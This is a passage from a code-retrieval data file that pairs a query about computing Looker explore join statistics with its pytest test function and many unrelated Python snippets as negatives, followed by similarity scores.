ax[2,1].hist(dr14vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',color='r')\n\n plots.plotc(ax[1,0],vhelio-dr14vhelio,vscat-dr14vscat,verr,xr=[-0.5,0.5],yr=[-0.3,0.3],zr=[0,0.15])\n plots.plotc(ax[0,1],sigfiber,vscat-dr14vscat,verr,zr=[0,0.15],yr=[-0.3,0.3])\n plots.plotc(ax[1,1],vscat,vscat-dr14vscat,verr,zr=[0,0.15],yr=[-0.3,0.3],xr=[0,0.5])\n ax[2,0].hist(vdiff,color='b',bins=np.arange(-1.,1,0.01),histtype='step')\n ax[2,0].hist(dr14vdiff,color='r',bins=np.arange(-1.,1,0.01),histtype='step')\n fig.tight_layout()\n plt.show()", "def list_meta_fields():\n ret = {}\n status, result = _query(action=\"meta\", command=\"fields\")\n root = ET.fromstring(result)\n for field in root:\n field_id = None\n field_ret = {\"name\": field.text}\n for item in field.items():\n field_ret[item[0]] = item[1]\n if item[0] == \"id\":\n field_id = item[1]\n ret[field_id] = field_ret\n return ret", "def stats(self):", "def __getQueryData(self, query, fieldNames):\n results = self.__getQueryObject(query)\n # print results\n data = []\n if results['totalRows'] != '0':\n for row in results['rows']:\n rowData = {}\n for name, field in zip(fieldNames, row['f']):\n rowData[name] = field['v']\n data.append(rowData)\n return data", "def get_fields(request):\n\n json_resp = {}\n json_resp['fields'] = []\n json_resp['fields_to_ann'] = []\n all = request.GET.get('all',None)\n workpath = os.path.dirname(os.path.abspath(__file__)) # Returns the Path your .py file is in\n auto_request = request.GET.get('ns_id', None)\n report = request.GET.get('report', None)\n # print(request.session['report_type'])\n if report is not None or all == 'all':\n if report is not None:\n if report.startswith('PUBMED_'):\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n json_resp = get_fields_from_json()\n if all == 'all':\n # All the possible fields for every usecase (MANUAL CONFIGURATION)\n json_resp = get_fields_from_json()\n if Report.objects.filter(institute = 'PUBMED').exists():\n json_resp['all_fields'].extend(['title','abstract','volume','journal','year','authors']) #aggiungo pubmed solo in coda!\n else:\n if request.session['report_type'] == 'pubmed':\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n # Fileds related exclusively to a usecase\n json_resp = get_fields_from_json_configuration(request.session['usecase'],request.session['institute'],request.session['language'])\n if request.session['mode'] == 'Robot' or auto_request == 'Robot':\n with open(os.path.join(workpath, './automatic_annotation/auto_fields/auto_fields.json')) as out:\n data = json.load(out)\n json_resp['fields_to_ann'] = data['extract_fields'][request.session['usecase']]\n for el in json_resp['fields_to_ann']:\n if el in json_resp['fields']:\n json_resp['fields'].remove(el)\n # print('FIELDS', json_resp)\n return JsonResponse(json_resp)", "async def _get_schema_info(self, app_id, namespace, gae_index_name):\n collection = get_collection_name(app_id, namespace, gae_index_name)\n solr_schema_info = await self.solr.get_schema_info(collection)\n fields_info = solr_schema_info['fields']\n id_field = SolrSchemaFieldInfo(\n solr_name='id', gae_name='doc_id', type=Field.Type.ATOM,\n language=None, docs_number=fields_info.get('id', {}).get('docs', 0)\n )\n rank_field = SolrSchemaFieldInfo(\n solr_name='rank', gae_name='rank', type=Field.Type.NUMBER,\n language=None, docs_number=fields_info.get('rank', {}).get('docs', 0)\n )\n fields = [id_field, rank_field]\n grouped_fields = {\n 'doc_id': [id_field],\n 'rank': [rank_field]\n }\n facets = []\n grouped_facet_indexes = {}\n\n for solr_field_name, info in fields_info.items():\n try:\n gae_name, type_, language = parse_solr_field_name(solr_field_name)\n except ValueError:\n continue\n schema_field = SolrSchemaFieldInfo(\n solr_field_name, gae_name, type_, language, info.get('docs', 0)\n )\n if SolrSchemaFieldInfo.Type.is_facet_index(type_):\n add_value(grouped_facet_indexes, gae_name, schema_field)\n if SolrSchemaFieldInfo.Type.is_facet(type_):\n facets.append(schema_field)\n else:\n fields.append(schema_field)\n add_value(grouped_fields, gae_name, schema_field)\n\n for fields_group in grouped_fields.values():\n if len(fields_group) > 1:\n # Sadly app uses the same name for fields with different types [*1].\n # Let's sort them from high popularity to low.\n fields_group.sort(key=lambda solr_field: -solr_field.docs_number)\n\n for facets_group in grouped_facet_indexes.values():\n if len(facets_group) > 1:\n # Sadly app uses the same name for facets with different types [*1].\n # Let's sort them from high popularity to low.\n facets_group.sort(key=lambda solr_field: -solr_field.docs_number)\n\n index_info = solr_schema_info['index']\n return SolrIndexSchemaInfo(\n app_id=app_id,\n namespace=namespace,\n gae_index_name=gae_index_name,\n collection=collection,\n docs_number=index_info['numDocs'],\n heap_usage=index_info['indexHeapUsageBytes'],\n size_in_bytes=index_info['segmentsFileSizeInBytes'],\n fields=fields,\n facets=facets,\n grouped_fields=grouped_fields,\n grouped_facet_indexes=grouped_facet_indexes\n )" ]
[ "0.757388", "0.66561705", "0.5693254", "0.5563461", "0.5562313", "0.55102324", "0.55069894", "0.54181457", "0.5415948", "0.53354806", "0.53127414", "0.528702", "0.5241747", "0.52340806", "0.52330387", "0.52114326", "0.51936793", "0.5185652", "0.51400167", "0.5138318", "0.5132618", "0.5127807", "0.51146215", "0.51070225", "0.5106135", "0.5088951", "0.50864375", "0.5081033", "0.50448966", "0.50198954", "0.5015429", "0.5009088", "0.5003628", "0.5003628", "0.5001013", "0.49991417", "0.49893072", "0.4987319", "0.4986451", "0.49833003", "0.49571592", "0.49468642", "0.4945561", "0.49320614", "0.49315163", "0.49265844", "0.4926118", "0.49182642", "0.49163514", "0.48885593", "0.4874684", "0.48683193", "0.48634312", "0.4846087", "0.48458105", "0.48332086", "0.4831649", "0.48200655", "0.48187646", "0.48147914", "0.48094964", "0.47901323", "0.4788112", "0.47852707", "0.47839144", "0.47706425", "0.47692594", "0.4766253", "0.47579056", "0.4720955", "0.4719269", "0.47170916", "0.47115842", "0.4706557", "0.4698921", "0.46831483", "0.46746755", "0.46736172", "0.46677616", "0.46628562", "0.46604782", "0.4660417", "0.46569505", "0.46547002", "0.46519625", "0.46508056", "0.46385604", "0.4636647", "0.4634278", "0.46265987", "0.46259937", "0.4620329", "0.46181014", "0.46164754", "0.46163332", "0.46132794", "0.46132034", "0.46101552", "0.46091598", "0.46053213" ]
0.7587318
0
fetcher.get_explore_join_stats() should return the stats of all joins in an explore.
def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model): explore = fc.get_explores( model=test_model["name"], explore="explore_2_joins_1_used" )[0] field_stats = { "explore_2_joins_1_used.d1": 10, "explore_2_joins_1_used.d2": 5, "explore_2_joins_1_used.d3": 0, "explore_2_joins_1_used.m1": 0, "join1.d1": 10, "join1.d2": 10, "join1.d3": 10, "join1.m1": 0, "join2.d1": 0, "join2.d2": 0, "join2.d3": 0, "join2.m1": 0, } join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats) assert isinstance(join_stats, dict) assert len(join_stats) == 2 assert join_stats == {"join1": 30, "join2": 0}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extract_join_info(node):\n operator_info = node['operatorInfo']\n analyze_info = node['AnalyzeInfo']\n\n if 'Join' in node['id']:\n # Join Node\n join_type = extract_join_type(operator_info)\n conditions = extract_join_conditions(operator_info)\n current_node = JoinPlan(join_type, conditions)\n assert 'children' in node and len(node['children']) == 2\n childrens = node['children']\n current_node.left_node = extract_join_info(childrens[0])\n current_node.right_node = extract_join_info(childrens[1])\n current_node.execute_time = analyze_info[\"time\"]\n current_node.est_rows = node[\"estRows\"]\n else:\n # Table Reader\n # assert 'TableReader' in node['id']\n # extract selection if need\n current_node = extract_table_reader(node)\n current_node.est_rows = node['estRows']\n return current_node", "def join_stats(join_on, mg_stats):\n new_stats = {}\n\n def add_metagenome_stats(new_mgs, old_mgs):\n return MetagenomeStats(*[getattr(new_mgs, f) + getattr(old_mgs, f) for f in old_mgs._fields])\n\n for mgs in mg_stats:\n # find maximally matching join criterion\n max_match = 0\n group = ''\n for grp in join_on:\n if grp in mgs[0] and len(grp) > max_match:\n max_match = len(grp)\n group = grp\n\n new_stats[group] = mgs[1] if group not in new_stats else add_metagenome_stats(mgs[1], new_stats[group])\n return new_stats", "def num_joins(self):\n return self._num_joins", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def joins(self):\n return self._joins", "def num_joins(self):\n ret_val = self._num_joins()\n return ret_val", "def get(self):\n join = request.args.get('join')\n limit = request.args.get('limit')\n\n current_user = User.find_by_username(get_jwt_identity())\n\n if join is None:\n room_list = Room.query.all()\n else:\n if join == 'true':\n room_list = current_user.joined_room\n else:\n room_list = Room.query.filter(~Room.members.any(id=current_user.id)) \\\n .limit(limit if limit is not None else 15).all()\n result = rooms_schema.dump(room_list)\n return {\"status\": \"success\", \"data\": result}, 200", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def join(self):\n super().join()\n return self.grad, self.traj_infos, self.opt_info", "async def on_member_join(self, member: Member) -> None:\n if member.guild.id != Guild.id:\n return\n\n self.bot.stats.gauge(\"guild.total_members\", len(member.guild.members))", "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def get_statistics(self):\n statistics = {\n 'entry': 0,\n 'bandwidth': 0,\n 'exit': 0,\n 'pages': 0\n }\n downloads = statistics.copy()\n \n portal_state = getMultiAdapter(\n (self.context, self.request), name=u'plone_portal_state'\n )\n context_state = getMultiAdapter(\n (self.context, self.request), name=u'plone_context_state'\n )\n site = portal_state.portal()\n \n url = self.context.absolute_url().replace(site.absolute_url(), '')\n urls = []\n if url == '':\n url = '/'\n quoted_url = urllib.quote(url)\n \n urls.append(quoted_url)\n urls.append(quoted_url + '/view')\n canonical_url = urllib.quote(context_state.canonical_object_url())\n if canonical_url not in urls:\n urls.append(canonical_url)\n urls.append(canonical_url + '/view')\n\n query = 'SELECT * FROM statistics WHERE url IN %s' % str(tuple(urls))\n results = Session.execute(query).fetchall()\n if results:\n for row in results:\n for key in statistics.keys():\n statistics[key] = statistics[key] + int(row[key])\n\n results_dw = Session.execute(\n 'SELECT * FROM statistics WHERE url=\"%s/at_download%%\"' % quoted_url).fetchall()\n if results_dw:\n for row in rows_stat:\n for key in statistics.keys():\n downloads[key] = downloads[key] + int(row[key])\n statistics['downloads'] = downloads['pages']\n return statistics", "def num_joins(self, num_joins):\n self._num_joins = num_joins", "async def on_member_join(self, member: discord.Member) -> None:\n\n await add_user_in_db(member, member.guild)\n\n guild_from_db = await Guilds.get(guild_id=member.guild.id)\n role_saver = guild_from_db.role_saver\n if role_saver:\n user_roles = await UserRoles.get_many(guild_id=member.guild.id, user_id=member.id)\n if user_roles:\n for rol in user_roles:\n role = discord.utils.get(member.guild.roles, id=rol.role_id)\n if role.name == '@everyone':\n continue\n else:\n await member.add_roles(role)\n\n await Profiles.update(user_id=member.id,\n guild_id=member.guild.id,\n set=[\"joins = joins + 1\"])\n await Guilds.update(guild_id=member.guild.id,\n set=[\"day_joins = day_joins + 1\"])\n\n await self.refresh_user_count_channel(member.guild)", "async def on_guild_join(self, guild):\n l.info(f\"Joined {guild.name} with {guild.member_count} users!\")", "def community_stats(request):\n stats = cache.get(STATS_CACHE_KEY, None)\n if not stats:\n\n stats = fetch(PEOPLE_STATS_URL)\n packages_data = fetch(PACKAGES_STATS_URL)\n if 'meta' in packages_data:\n stats.update({'packages': packages_data['meta']['total_count']})\n\n stats = {'community_stats': stats}\n\n cache.add(STATS_CACHE_KEY, stats, 60 * 60 * 12) # for half a day\n\n return stats", "def joincount(pntGraph, lineGraph, criterion='', threshold=0):\n matNumDict, _ = spatialjoin._spatialjoin(pntGraph, lineGraph, criterion, threshold)\n for edge in lineGraph.edges(data=True):\n edge[2]['joinCount'] = matNumDict[edge[2]['Ind']]\n print('The join count is added to the POLYLINE type graph.')", "def ingest_joined_data(self, joined_data_buffer, ratio=0.8):\n # local join to simulate a joining workflow\n\n # update next_join_job_id and joining state\n next_join_job_id = JoinManager.name_next_join_job(experiment_id=self.experiment_id)\n self.exp_db_client.update_experiment_next_join_job_id(self.experiment_id, next_join_job_id)\n self.exp_db_client.update_experiment_joining_state(self.experiment_id, JoiningState.PENDING)\n\n self.next_join_job = JoinManager(\n join_db_client=self.join_db_client,\n experiment_id=self.experiment_id,\n join_job_id=next_join_job_id,\n input_obs_data_s3_path=\"local-join-does-not-apply\",\n input_reward_data_s3_path=\"local-join-does-not-apply\",\n boto_session=self.boto_session,\n )\n\n logger.info(\"Started dummy local joining job...\")\n self.next_join_job.start_dummy_join(joined_data_buffer=joined_data_buffer, ratio=ratio)\n\n # this method can be invoked either in local/SM mode\n succeeded_state = (\n self.experiment_record._joining_state == JoiningState.SUCCEEDED\n and self.experiment_record._last_joined_job_id == next_join_job_id\n and self.experiment_record._next_join_job_id is None\n )\n num_retries = 0\n\n while not succeeded_state:\n # Sync experiment state if required\n self._sync_experiment_state_with_ddb()\n logger.debug(\"Waiting for experiment table joining status to be updated...\")\n time.sleep(2 * (2 ** num_retries))\n succeeded_state = (\n self.experiment_record._joining_state == JoiningState.SUCCEEDED\n and self.experiment_record._last_joined_job_id == next_join_job_id\n and self.experiment_record._next_join_job_id is None\n )\n num_retries += 1\n if num_retries >= 5:\n raise UnhandledWorkflowException(\n f\"Joining job '{self.experiment_record._next_join_job_id}' \"\n f\"was in state of '{self.experiment_record._joining_state}'. Failed to sync table states.\"\n )\n if (\n self.experiment_record._joining_state == JoiningState.FAILED\n or self.experiment_record._joining_state == JoiningState.CANCELLED\n ):\n raise WorkflowJoiningJobException(\n f\"Joining job '{self.experiment_record._next_join_job_id}' \"\n f\"ended with state '{self.experiment_record._joining_state}'. Please check if provided \"\n \"joined_data_buffer was in correct data format.\"\n )", "def search_all_join_on(sql_dict, table_json, args, join_on_label=None):\n all_from = []\n global globe_join_on_label_count\n globe_join_on_label_count = 0\n\n sql_dict['where'] = intersect_check(sql_dict['where'])\n groupby_list = []\n groupby_top = \"\"\n re_sql = \"select distinct \" if sql_dict['select'][0] else \"select \"\n orderby_sql, table_list, agg_in_order = (\"\", [], False)\n # if args.orderby_to_subquery and is_orderby_for_subquery(sql_dict): # v1.1\n # orderby_sql,table_list,agg_in_order = (\"\",[],False)\n # else:\n # orderby_sql,table_list,agg_in_order = create_order_by(sql_dict['orderBy'],sql_dict['limit'])\n\n # Get table info from select column\n for column in sql_dict['select'][1]:\n table = column[1][1][1].split('.')[0].lower()\n if not table in table_list:\n table_list.append(table)\n select_unit = select_unit_back(column)\n if not (column[0] or column[1][1][0]):\n groupby_list.append(select_unit)\n re_sql += select_unit + ' , '\n re_sql = re_sql[:-3]\n top_select_table_list = copy.deepcopy(table_list)\n # Add table info to select column\n break_idx, table_list, next_sql, sql_where, sql_having, orderby_sql_, next_table_list = get_where_column(sql_dict,\n table_list,\n 0, SQL_TOP,\n table_json,\n args)\n if break_idx < 0 or next_sql == SQL_TOP:\n orderby_sql, table_list_order, agg_in_order = create_order_by(sql_dict['orderBy'], sql_dict['limit'])\n for order_t in table_list_order:\n if order_t.lower() not in table_list:\n table_list.append(order_t.lower())\n\n if sql_dict['groupBy']: # V1.1:\n groupby_top = \" group by \" + col_unit_back(sql_dict['groupBy'][0])\n elif (len(groupby_list) != len(sql_dict['select'][1]) and groupby_list) or sql_having.strip() != '' or (\n agg_in_order and groupby_list) or orderby_sql_.strip():\n if args.group_for_exact_match and len(groupby_list) > 1:\n groupby_list = infer_group_for_exact_match(groupby_list, table_json)\n groupby_top = \" group by \" + \",\".join(groupby_list)\n\n orderby_sql += orderby_sql_\n from_table_net, table_fk_list = get_table_network(table_json, table_list, join_on_label)\n\n from_table_netss, _ = get_table_network(table_json, table_list, join_on_label, False)\n all_from.append(from_table_netss)\n\n top_sql_list = [re_sql]\n re_sql += create_from_table(from_table_net, table_json['table_names_original'],\n table_json['table_column_names_original'], table_fk_list)\n top_sql_list.append(re_sql + sql_where + groupby_top + sql_having)\n\n if sql_dict['where']:\n while next_sql:\n table_list = next_table_list # []#V1.2\n if next_sql == SQL_TOP:\n sub_sql = \" \" + sql_dict['where'][break_idx][:-1] + \" \" + top_sql_list[0]\n table_list = top_select_table_list\n start_new_top_sql = True\n else:\n select_column = col_unit_back(sql_dict['where'][break_idx][3])\n sub_sql = \"select \" + select_column\n if sql_dict['where'][break_idx][3][1].split('.')[0].lower() not in table_list:\n table_list.append(sql_dict['where'][break_idx][3][1].split('.')[0].lower())\n start_new_top_sql = False\n\n break_idx, table_list, next_sql, sql_where, sql_having, orderby_sql_, next_table_list = get_where_column(\n sql_dict, table_list, break_idx + 1, next_sql, table_json, args)\n if args.orderby_to_subquery and not orderby_sql_:\n orderby_sql_, table_list = orderby_to_subquery(sql_dict, table_list) # v1.1\n\n # if not start_new_top_sql:\n from_table_net, table_fk_list = get_table_network(table_json, table_list, join_on_label)\n from_table_netss, _ = get_table_network(table_json, table_list, join_on_label, False)\n all_from.append(from_table_netss)\n sub_sql += create_from_table(from_table_net, table_json['table_names_original'],\n table_json['table_column_names_original'], table_fk_list)\n\n # if sql_where.strip() != 'where':\n sub_sql += sql_where\n\n if not start_new_top_sql:\n # if (sql_having.strip() and select_column) or (orderby_sql_.strip() and select_column):#v1.0\n if (sql_having.strip() and select_column) or ((\n \"max(\" in orderby_sql_ or \"min(\" in orderby_sql_ or \"count(\" in orderby_sql_ or \"sum(\" in orderby_sql_ or \"avg(\" in orderby_sql_) and select_column): # v1.0\n sub_sql += \" group by \" + select_column\n else:\n if groupby_top.strip():\n sub_sql += groupby_top\n elif (sql_having.strip() != '' and groupby_list) or (orderby_sql_.strip() and groupby_list):\n sub_sql += \" group by \" + \",\".join(groupby_list)\n\n sub_sql += sql_having + orderby_sql_\n\n if start_new_top_sql:\n top_sql_list.append(sub_sql)\n else:\n top_sql_list[len(top_sql_list) - 1] = top_sql_list[len(top_sql_list) - 1].replace('@@@', sub_sql, 1)\n\n re_sql = \"\"\n for idx, sql in enumerate(top_sql_list):\n if idx > 0:\n re_sql += sql\n\n re_sql += orderby_sql\n\n return re_sql, all_from, sql_dict", "def on_join_data(self, data):\n self.users.client.key = data[7] # unique user identifier ?\n self.users.client.join_time = data[11] # join time as unix including milliseconds ?\n self._room_id = data[13] # room id\n\n self.send_connection_ok()\n\n if config.DEBUG_TO_CONSOLE:\n print ('Join Data:')\n for i, v in enumerate(data):\n print ('\\t[%s] - %s' % (i, v))", "def test_combine_peer_stats(self):\n tracts = Geo.objects.filter(geo_type=Geo.TRACT_TYPE, cbsa=request.GET.get('metro'))\n metro = Geo.objects.get(geo_type=Geo.METRO_TYPE, geoid=request.GET.get('metro'))\n lender = Institution.objects.get(institution_id=request.GET.get('lender'))\n peers = lender.get_peer_list(metro, None, None)\n peer_data_collector = []\n for peer in peers:\n peer_request = HttpRequest()\n peer_request.GET['lender'] = peer.institution.institution_id\n peer_request.GET['metro']= metro.geoid\n peer_lar_data = loan_originations_as_json(peer_request)\n peer_data_collector.append(assemble_stats(peer_lar_data, tracts))\n peer_stats = combine_peer_stats(peer_data_collector)\n self.assertEqual(peer_stats['hma_pct'], 0.0)\n self.assertEqual(peer_stats['lma_pct'], 1.0)\n self.assertEqual(peer_stats['mma_pct'], 0.0)\n self.assertEqual(peer_stats['lma'], 7)\n self.assertEqual(peer_stats['mma'], 0)\n self.assertEqual(peer_stats['hma'], 0)\n self.assertEqual(peer_stats['lar_total'], 7)", "def raw_joins(self):\n return self.obj_payload[\"joins\"]", "def fetch_metrics(self):\n\n self.explain_all_indices()", "def get_joins(self, p, vv):\n self._get_joins(p, vv)", "def get_workspace_share_details():\n\n # connect to mysql\n db_connection = mysql.connect(\n host=sql_host, user=\"metrics\", passwd=metrics_mysql_password, database=\"metrics\"\n )\n\n cursor = db_connection.cursor()\n query = \"use \" + query_on\n cursor.execute(query)\n\n workspaces_dict = get_workspaces(db_connection)\n kb_staff = get_kbase_staff(db_connection)\n (workspaces_dict, max_shared_count) = get_workspace_shares(\n workspaces_dict, kb_staff\n )\n\n ################\n # Print the header line:\n ################\n header_line = (\n \"Narrative ID\\tOwner\\tCreation Date\\tLast Modified\\tis_deleted\\tis_public\"\n )\n for i in range(max_shared_count):\n header_line += \"\\tShared_person_{}\\tShare_Type_{}\\tis_KB_Staff_{}\".format(\n str(i + 1), str(i + 1), str(i + 1)\n )\n print(header_line)\n\n ###############\n # Print the WS rows\n ###############\n for ws_id in workspaces_dict:\n print(\n \"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\".format(\n str(ws_id),\n workspaces_dict[ws_id][\"username\"],\n workspaces_dict[ws_id][\"creation_date\"],\n workspaces_dict[ws_id][\"mod_date\"],\n str(workspaces_dict[ws_id][\"is_deleted\"]),\n str(workspaces_dict[ws_id][\"is_public\"]),\n \"\\t\".join(workspaces_dict[ws_id][\"shares_list\"]),\n )\n )", "def api_contests_join():\n if request.method == 'GET':\n user = get_queryparam('user')\n returnJSON = models.select_joined_contest(\n params=('*'),\n conditions=('{}=\\\"{}\\\"'.format(\n settings.DB_COLUMNS.JOINED_CONTEST_USER,\n user\n )\n )\n )\n return jsonify(returnJSON)\n elif request.method == 'POST':\n postJSON = request.get_json()\n models.insert_joined_contest(\n postJSON[settings.DB_COLUMNS.JOINED_CONTEST_USER],\n postJSON[settings.DB_COLUMNS.JOINED_CONTEST_CONTEST]\n )\n return ('', 204)\n elif request.method == 'DELETE':\n postJSON = request.get_json()\n models.delete_joined_contest(\n postJSON[settings.DB_COLUMNS.JOINED_CONTEST_USER],\n postJSON[settings.DB_COLUMNS.JOINED_CONTEST_CONTEST]\n )\n return ('', 204)", "def get_joins(self):\n\t\tprint('connecting to Sql Server:\\n\\tserver: {server}\\n\\tdatabase: {database}'.format(**self.__dict__))\n\t\t# Child: <schema>.<table>\n\t\t# Parent: <schema>.<table>\n\t\t# Column: <column>\n\t\tJoin = namedtuple('Join', 'Child,Column,Datatype,Parent')\n\t\twith pymssql.connect(self.server, self.user, self.password, self.database) as conn:\n\t\t\t# read sql source file\n\t\t\tprint('reading query_file: {}'.format(self.query_file))\n\t\t\twith open(self.query_file) as sqlfile:\n\t\t\t\tquery = sqlfile.read()\n\t\t\t\t# connect to SQL Server\n\t\t\t\t# init query\n\t\t\t\tcur = conn.cursor()\n\t\t\t\tprint('executing query')\n\t\t\t\tcur.execute(query)\n\t\t\t\t# load query results into list of namedtuple python data structure\n\t\t\t\tself.joins = [j for j in map(Join._make, cur)]\n\t\t\t\t# leave file, sql connection contexts", "def join_ids(self) -> List[int]:\n return self._join_ids", "def stats():\n return jsonify(shorten.get_stats(get_db(), app.config['MINI_URL_BASE']))", "def _get_open_projects_info():\n projects = Project.objects.filter(project_open=True).order_by(\"created_at\")\n projects_sum_hours = []\n for project in projects:\n time_entries_pro_project = TimeEntry.objects.filter(project=project)\n used_hours = _sum_hours(time_entries_pro_project)\n hours_percent = _calculate_hours_percent(used_hours, project.stimated_hours)\n projects_sum_hours.append(\n {\n \"hours_percent_number\": hours_percent,\n \"hours_percent\": f\"{hours_percent}%\",\n \"worked_hours\": used_hours,\n \"project\": project,\n }\n )\n return projects_sum_hours", "async def on_member_join(self, member: discord.Member) -> None:\n\n # retrieve logging information\n if logging_info := (await typed_retrieve_query(\n self.bot.database,\n PartialLoggingAction,\n 'SELECT CHANNEL_ID, BITS FROM LOGGING WHERE GUILD_ID=?',\n (member.guild.id,))\n ):\n await log_to_channel(\n self.bot,\n LoggingActions.USER_JOINED,\n logging_info[0].bits,\n logging_info[0].channel_id,\n f'**{str(member)}** joined the guild.'\n )", "def getJoinedFields(self, join_name):\n result = []\n objects_cls = self.getClass()\n if objects_cls:\n from cdb.platform.mom import entities, fields\n cls = entities.Class.ByKeys(objects_cls._getClassname())\n result = [f.field_name for f in cls.DDAllFields\n if isinstance(f, fields.DDJoinedField) and f.join_alias == join_name]\n return result", "def process_join(data: JoinedQueryData, verbose: bool) -> str:\n # The collection (sometimes referred to as \"type\" in the docs) to join\n string = 'type:' if verbose else ''\n string += str(data.collection)\n # The fields used to link the two collections\n if (parent := data.field_on) is not None:\n string += f'^on:{parent}'\n if (child := data.field_to) is not None:\n string += f'^to:{child}'\n # Flags\n if (is_list := data.is_list) or verbose:\n string += '^list:' + ('1' if is_list else '0')\n if not (is_outer := data.is_outer) or verbose:\n string += '^outer:' + ('1' if is_outer else '0')\n # Show/hide field lists\n if show := data.show:\n string += '^show:' + '\\''.join(str(s) for s in show)\n elif hide := data.hide:\n string += '^hide:' + '\\''.join(str(s) for s in hide)\n # Inject at name\n if (name := data.inject_at) is not None:\n string += f'^inject_at:{name}'\n # QueryBase terms\n if terms := data.terms:\n string += '^terms:' + '\\''.join(t.serialise() for t in terms)\n # Process nested (inner) joins\n if joins := data.joins:\n string += f'({\",\".join(process_join(j, verbose) for j in joins)})'\n return string", "def get_host_stats(self, refresh=False):", "def fetch_info():\n global JOLOKIA_CONNECTIONS\n for connection in JOLOKIA_CONNECTIONS.keys():\n try:\n data = JOLOKIA_CONNECTIONS[connection]['j4p'].getRequests()\n for ele in data:\n parse_info(ele, JOLOKIA_CONNECTIONS[connection]['instance'])\n except Exception, e:\n collectd.error('jolokia plugin: Error at jolokia endpoint %s - %r' % (connection, e))", "def GetStats(self):\r\n\t\tArg1 = self.href\r\n\t\treturn self._execute('GetStats', payload=locals(), response_object=None)", "def get_visits(visit_container):\r\n return visit_container.visits.all()", "def get_statistic():\n try:\n data = r.table('interests').run(g.rdb_conn)\n except Exception as e:\n add_to_log('error during get statistic', e)\n return e, 500\n else:\n results = []\n for i in data.items:\n results.append(i['interests'])\n return json.dumps(results)", "def get_buildbot_stats(time_window : datetime.datetime) -> BuildStats:\n print('getting list of builders...')\n stats = BuildStats()\n for builder in requests.get(BASE_URL).json().keys():\n # TODO: maybe filter the builds to the ones we care about\n stats += get_builder_stats(builder, time_window )\n return stats", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def get_metrics(session, fill_id, population_id, properties_id, aggregations_id, label_lang):\n prop_id = properties_id.id\n properties = properties_id.properties\n property_query_cols = generate_json_expansion_values(properties)\n\n query_cols = [*property_query_cols, metric.bias_value, metric.total]\n\n metrics_q = session.query(*query_cols) \\\n .join(metric_properties_j, metric.properties_id == metric_properties_j.id) \\\n .join(metric_aggregations_j, metric.aggregations_id == metric_aggregations_j.id) \\\n .filter(metric.properties_id == prop_id) \\\n .filter(metric.fill_id == fill_id) \\\n .filter(metric.population_id == population_id) \\\n .order_by(metric.aggregations_id)\n if isinstance(aggregations_id, int):\n metrics_q = metrics_q.filter(metric.aggregations_id == aggregations_id)\n if isinstance(aggregations_id, list):\n metrics_q = metrics_q.filter(metric.aggregations_id.in_(aggregations_id))\n if isinstance(aggregations_id, dict):\n for prop_pos, (prop_id, val) in enumerate(aggregations_id.items()):\n if val == 'all':\n continue\n else:\n prop_pos_after_bias = prop_pos + 1\n a_man = aliased(metric_aggregations_n)\n val_predicate = val(a_man.value) if callable(val) else a_man.value == val\n metrics_q = metrics_q.join(a_man, and_(metric.aggregations_id == a_man.id,\n a_man.aggregation_order == prop_pos_after_bias,\n a_man.property == prop_id,\n val_predicate))\n\n # if a label_lang is defined we need to make a subquery\n if label_lang is not None:\n metrics_subq = metrics_q.subquery('metrics_driver')\n metrics_q = label_metric_query(session, metrics_subq, properties, label_lang)\n\n log.debug(f'metrics_q is:'\n f' {metrics_q.statement.compile(compile_kwargs={\"literal_binds\": True})}')\n metrics = metrics_q.all()\n metrics_columns = metrics_q.column_descriptions\n log.debug(f'Number of metrics to return are {len(metrics)}')\n return metrics, metrics_columns", "async def on_member_join(member: Member):\n await member_handler.member_joined(member)", "def join(self, *joins, jtype='inner'):\n assert jtype in ('inner', 'outer')\n for j in joins:\n self._joins.append(f'{jtype} join {j}')\n return self", "def test_communities_joined_limit(self):\n self.assertEqual(settings.QUIZZZ_JOINED_COMMUNITIES_LIMIT, 20)\n\n with self.settings(QUIZZZ_JOINED_COMMUNITIES_LIMIT=3):\n self.login_as(\"admin\")\n for i in range(settings.QUIZZZ_JOINED_COMMUNITIES_LIMIT):\n response = self.client.post(reverse('communities:create-community'), {\"name\": f\"test-group-{i}\"})\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.login_as(\"ben\")\n for 